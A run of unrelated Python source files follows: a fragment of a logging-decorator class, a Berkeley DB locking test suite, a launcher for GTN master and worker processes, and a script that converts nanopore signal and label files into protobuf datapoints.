return partial(Debugging.darg, prefix=prefix)
msg = '<a{}> {} '.format(prefix,cls._qname(func.__name__))
@wraps(func)
def wrapper(*args, **kwargs):
ldslog.info(msg+str(args)+'//'+str(kwargs))
return func(*args, **kwargs)
return wrapper
#logs result of func
@classmethod
def dres(cls,func=None, prefix=''):
if func is None:
return partial(Debugging.dres, prefix=prefix)
msg = '<r{}> {} '.format(prefix,cls._qname(func.__name__))
@wraps(func)
def wrapper(*args, **kwargs):
res = func(*args, **kwargs)
ldslog.info(msg+str(res))
return res
return wrapper
@classmethod
def _qname(cls,fn):
'''Replacement for func.__qualname__ from Py3'''
try: gn = globals()[fn]
except KeyError: gn = ''
return '{}.{}'.format(fn,gn)
# class STObj(object):
# def __init__(self,m,a):
# self.method = m
# self.args = a
# self.success = False
#
# def setResult(self,res):
# self.res = res
#
# def getResult(self):
# return self.res
# def _pickle_method(method):
# func_name = method.im_func.__name__
# obj = method.im_self
# cls = method.im_class
# return _unpickle_method, (func_name, obj, cls)
#
# def _unpickle_method(func_name, obj, cls):
# for cls in cls.mro():
# try:
# func = cls.__dict__[func_name]
# except KeyError:
# pass
# else:
# break
# return func.__get__(obj, cls)
#
# import copy_reg
# import types
#
# copy_reg.pickle(types.MethodType, _pickle_method, _unpickle_method)
|
test_lock.py
|
"""
Copyright (c) 2008-2022, Jesus Cea Avion <jcea@jcea.es>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of Jesus Cea Avion nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
"""
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from .test_all import db, rmtree, verbose, \
get_new_environment_path, get_new_database_path
from threading import Thread, current_thread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test01_simple..." % self.__class__.__name__)
anID = self.env.lock_id()
if verbose:
print("locker ID: %s" % anID)
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print("Aquired lock: %s" % lock)
self.env.lock_put(lock)
if verbose:
print("Released lock: %s" % lock)
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test02_threaded..." % self.__class__.__name__)
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 0)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 0)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 123456)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 7890123)
def test04_lock_timeout2(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
t.daemon = True
t.start()
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
# Floating point rounding
self.assertTrue((end_time-start_time) >= 0.0999)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
self.assertTrue(deadlock_detection.count>0)
def test05_not_None(self):
anID = self.env.lock_id()
try:
self.assertRaises(TypeError, self.env.lock_get,
anID, None, db.DB_LOCK_WRITE)
finally:
self.env.lock_id_free(anID)
def theThread(self, lockType):
name = current_thread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print("%s: locker ID: %s" % (name, anID))
for i in range(1000) :
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print("%s: Aquired %s lock: %s" % (name, lt, lock))
self.env.lock_put(lock)
if verbose:
print("%s: Released %s lock: %s" % (name, lt, lock))
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
for test in (LockingTestCase,):
test = unittest.defaultTestLoader.loadTestsFromTestCase(test)
suite.addTest(test)
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
GTN.py
|
import yaml
import torch
import multiprocessing as mp
import sys
import time
from agents.GTN_master import GTN_Master
from agents.GTN_worker import GTN_Worker
"""
script to run GTN master & workers locally
"""
def run_gtn_on_single_pc(config):
def run_gtn_worker(id):
gtn = GTN_Worker(id)
gtn.run()
def run_gtn_master(config):
gtn = GTN_Master(config)
gtn.run()
p_list = []
# cleanup working directory from old files
gtn_base = GTN_Master(config)
gtn_base.clean_working_dir()
time.sleep(2)
# first start master
p = mp.Process(target=run_gtn_master, args=(config,))
p.start()
p_list.append(p)
# then start workers
num_workers = config["agents"]["gtn"]["num_workers"]
for id in range(num_workers):
p = mp.Process(target=run_gtn_worker, args=(id,))
p.start()
p_list.append(p)
# wait till everything has finished
for p in p_list:
p.join()
def run_gtn_on_multiple_pcs(config, id):
if id == -1:
gtn_master = GTN_Master(config)
gtn_master.clean_working_dir()
gtn_master.run()
elif id >= 0:
gtn_worker = GTN_Worker(id)
gtn_worker.run()
else:
raise ValueError("Invalid ID")
if __name__ == "__main__":
with open("../default_config_halfcheetah_reward_env.yaml", "r") as stream:
config = yaml.safe_load(stream)
gtn_config = config['agents']['gtn']
config['agents']['gtn']['mode'] = 'single'
mode = config['agents']['gtn']['mode']
torch.set_num_threads(gtn_config['num_threads_per_worker'])
if mode == 'single':
run_gtn_on_single_pc(config)
elif mode == 'multi':
for arg in sys.argv[1:]:
print(arg)
id = int(sys.argv[1])
run_gtn_on_multiple_pcs(config, id)
|
_signal_label.py
|
import argparse
import logging
import gzip
from os import path
import typing
import os
from tqdm import tqdm
from typing import NamedTuple
from .. import dataset_pb2
import numpy as np
import multiprocessing as mp
import threading
from glob import glob
class MinionDataCfg(NamedTuple):
input: str
out: str
class ProcessDataPointCfg(NamedTuple):
fname_no_ext: str
cfg: MinionDataCfg
completed: mp.Queue
def processDataPoint(cfgDp: ProcessDataPointCfg):
try:
cfg = cfgDp.cfg
sol = dataset_pb2.DataPoint()
with open(cfgDp.fname_no_ext + ".signal", "r") as f:
signal = np.array(f.readlines()[0].split(), dtype=float)
sol.MergeFrom(dataset_pb2.DataPoint(signal=signal))
with open(cfgDp.fname_no_ext + ".label", "r") as f:
labels = []
bcall: typing.List[dataset_pb2.BasePair] = []
for l, u, b in [x.split() for x in f.readlines() if len(x)]:
labels.append(
dataset_pb2.DataPoint.BPConfidenceInterval(
lower=l,
upper=u,
pair=typing.cast(dataset_pb2.BasePair, dataset_pb2.BasePair.Value(b.upper())),
)
)
bcall.append(dataset_pb2.BasePair.Value(b.upper()))
sol.MergeFrom(
dataset_pb2.DataPoint(
basecalled=bcall,
labels=labels,
cigar=[dataset_pb2.MATCH] * len(bcall),
aligned_ref=bcall,
aligned_ref_squiggle=bcall,
basecalled_squiggle=bcall,
)
)
fname_out = path.join(cfg.out, cfgDp.fname_no_ext.split(os.sep)[-1] + ".datapoint")
with gzip.open(fname_out, "w") as f:
sol_pb_str = sol.SerializeToString()
f.write(sol_pb_str)
cfgDp.completed.put(sol_pb_str)
except Exception as ex:
logging.getLogger(__name__).error(f"Cannot process {cfgDp.fname_no_ext} {type(ex).__name__}\n{ex}", exc_info=True)
cfgDp.completed.put(ex)
def main(cfg: MinionDataCfg):
os.makedirs(cfg.out, exist_ok=True)
all = glob(cfg.input + "/*.signal")
with tqdm(total=len(all), desc="preparing dataset") as pbar:
with mp.Pool() as p:
m = mp.Manager()
q = m.Queue()
def f():
for _ in range(len(all)):
q.get()
pbar.update()
threading.Thread(target=f, daemon=True).start()
p.map(
processDataPoint,
[ProcessDataPointCfg(
fname_no_ext=os.path.splitext(x)[0],
cfg=cfg,
completed=q,
) for x in all]
)
def run(args):
logging.basicConfig(level=logging.INFO)
if args.debug:
logging.basicConfig(level=logging.DEBUG)
cfg = MinionDataCfg(
input=path.abspath(args.input),
out=path.abspath(args.out),
)
main(cfg)
return 0
def add_args(parser: argparse.ArgumentParser):
parser.add_argument("--input", "-i", help="input folder with .signal and .label files", required=True)
parser.add_argument("--out", "-o", help="output folder", required=True)
parser.set_defaults(func=run)
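# Hedged sketch (added for illustration, standalone): the same pool + managed-queue +
# progress-thread pattern that main() uses above, reduced to a toy job so it runs without any
# .signal/.label files. _square_job lives at module level so worker processes can pickle it.
def _square_job(args):
    x, q = args
    q.put(x)  # report completion through the managed queue
    return x * x

def _progress_pattern_example(n=100):
    with tqdm(total=n, desc="toy jobs") as pbar:
        with mp.Pool() as p:
            q = mp.Manager().Queue()
            def drain():
                for _ in range(n):
                    q.get()
                    pbar.update()
            threading.Thread(target=drain, daemon=True).start()
            return p.map(_square_job, [(i, q) for i in range(n)])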
|